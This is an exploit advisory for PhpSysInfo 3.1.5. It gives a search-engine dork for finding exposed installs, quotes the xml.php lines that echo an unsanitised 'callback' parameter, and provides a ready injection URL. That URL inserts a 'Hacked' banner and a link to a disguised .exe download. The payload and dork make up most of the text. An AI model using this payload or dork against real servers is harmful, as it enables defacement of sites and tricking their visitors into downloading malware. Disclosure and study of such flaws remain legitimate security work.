phpsysinfo 3.1.5 exploit# Exploit Title: PhpSysInfo 3.1.5
# Google Dork: [inurl:”phpsysinfo” intitle:”System Information”]
# Date: 18/07/2013
# Exploit Author: Fabio Natalucci
# Vendor Homepage: http://rk4an.github.io/phpsysinfo/
# Software Link: http://rk4an.github.io/phpsysinfo/
# Version: 3.1.5
# Tested on: ALL
# CVE : none

Hello guys this is a very simple hack.
This was a challange with my “boss” (GI). I give him a little demostration that this script is not secure to put on servers.

# POC

File “xml.php”

#46 // if $output is correct generate output in proper type
#47 if (isset($output) && is_object($output)) {
#48 if (isset($_GET[‘json’]) || isset($_GET[‘jsonp’])) {
#49 $json = json_encode(
#50 simplexml_load_string($output->getXMLString())
#51 );
#52 echo (isset($_GET[‘jsonp’])) ? $_GET[‘callback’] . ‘(‘.$json.’)’ : $json;
#53 } else {
#54 $output->run();
#55 }
#56 }

On line 52 there’s a print of $_GET value. This can be exploited in different ways.

Example: http://www.example.com/xml.php?jsonp=1&callback=<html><meta%20http-equiv=”Content-Type”%20content=”text/html;%20charset=UTF-8″%20/><a%20href=”../../badfiletodownloadwithurlobfuscation.exe”><h1>Hacked<br><h4>Hello boss, do you want play with me?</h4></h1></a><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR></html>

# Thanks to Fabrizio and Giulio for fun.
# Cheers!